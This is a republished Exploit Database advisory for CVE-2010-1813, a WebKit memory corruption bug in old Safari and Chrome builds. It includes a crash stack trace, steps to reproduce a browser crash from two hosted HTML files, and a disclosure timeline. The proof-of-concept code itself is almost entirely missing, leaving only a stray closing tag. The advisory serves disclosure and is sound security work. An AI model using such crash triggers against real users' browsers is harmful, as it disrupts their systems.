Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption

Exploit Database
113 阅读

作者： Jose A. Vazquez

日期： 2010-09-10
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/14967/

100

101

102

103

104

105

106

107

108

109

110

111

112

TITLE: WEBKIT (APPLE SAFARI < 4.1.2/5.0.2 & GOOGLE CHROME < 5.0.375.125) MEMORY CORRUPTION VULNERABILITY

TESTED OS: WINDOWS XP SP3

SEVERITY: HIGH

CVE-NUMBER: CVE-2010-1813

DISCOVERED DATE: 2010-06-29

FIXED DATE: GOOGLE CHROME (2010-07-26) & APPLE SAFARI (2010-09-08)

FIXED VERSIONS: GOOGLE CHROME 5.0.375.125 & APPLE SAFARI 4.1.2/5.0.2

DISCOVERED BY: JOSE A. VAZQUEZ

======ABOUT APPLICATION======

"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version

of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and

JavaScript code began as a branch of the KHTML and KJS libraries from KDE..." copied from http://webkit.org/

======DESCRIPTION======

A memory corruption vulnerability was confirmed by Chromium Security Team. Original stacktrace showed a null ptr

dereference, but some pointers were also corrupted.

Stacktrace (using Chrome symbols):

WebCore::RenderObject::containingBlock()Line 597

WebCore::RenderBlock::paintContinuationOutlines()Line 2344

WebCore::RenderBlock::paintObject()Line 2232

WebCore::RenderBlock::paint()Line 1980

WebCore::RenderLayer::paintLayer()Line 2447

WebCore::RenderLayer::paintList()Line 2499

WebCore::RenderLayer::paintLayer()Line 2468

WebCore::RenderLayer::paint()Line 2252

WebCore::FrameView::paintContents()Line 1943

WebCore::ScrollView::paint()Line 797

WebCore::RenderWidget::paint()Line 281

WebCore::InlineBox::paint()Line 180

WebCore::InlineFlowBox::paint()Line 682

WebCore::RootInlineBox::paint()Line 167

WebCore::RenderLineBoxList::paint()Line 219

WebCore::RenderBlock::paintContents()Line 2090

WebCore::RenderBlock::paintObject()Line 2199

WebCore::RenderBlock::paint()Line 1980

WebCore::RenderBlock::paintChildren()Line 2127

WebCore::RenderBlock::paintContents()Line 2092

WebCore::RenderBlock::paintObject()Line 2199

WebCore::RenderBlock::paint()Line 1980

WebCore::RenderLayer::paintLayer()Line 2445

WebCore::RenderLayer::paintList()Line 2499

WebCore::RenderLayer::paintLayer()Line 2468

WebCore::RenderLayer::paint()Line 2252

WebCore::FrameView::paintContents()Line 1943

WebCore::ScrollView::paint()Line 797

WebKit::WebFrameImpl::paintWithContext()Line 1795

WebKit::WebFrameImpl::paint()Line 1818

WebKit::WebViewImpl::paint()Line 979

RenderWidget::PaintRect()Line 390

RenderWidget::DoDeferredUpdate()Line 501

RenderWidget::CallDoDeferredUpdate()Line 428

======PROOF OF CONCEPT======

File 1.html:

File 2.html:

</dialog>

======STEPS TO REPRODUCE======

1.- Upload 1.html and 2.html to your server.

2.- Open file 1.html with vulnerable app.

-Google Chrome:

3.- Wait for a while, then, crash is got (sad-tab).

-Apple Safari:

3.- Wait for a while, if crash is not got, use Ctrl+T to trigger it.

======REFERENCES======

[ref-1] -> https://bugs.webkit.org/show_bug.cgi?id=41373

[ref-2] -> http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html

[ref-3] -> http://support.apple.com/kb/HT4334

[ref-4] -> http://spa-s3c.blogspot.com/2010/09/full-responsible-disclosurewebkit-apple.html

======DISCLOSURE TIMELINE======

Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)

[2010-06-29] => Posted new issue in Chromium Project (with pocs).

[2010-06-29] => Chromium confirmed memory corruption and opened new webkit bug.

[2010-07-26] => Chromium released new fix (Google Chrome 5.0.375.125).

[2010-09-08] => Apple released new fix (Apple Safari 4.1.2/5.0.2).

[2010-09-10] => Public disclosure.

======CREDITS=======

Jose Antonio Vazquez Gonzalez,

Telecom. Engineer & Sec. Researcher.

http://spa-s3c.blogspot.com/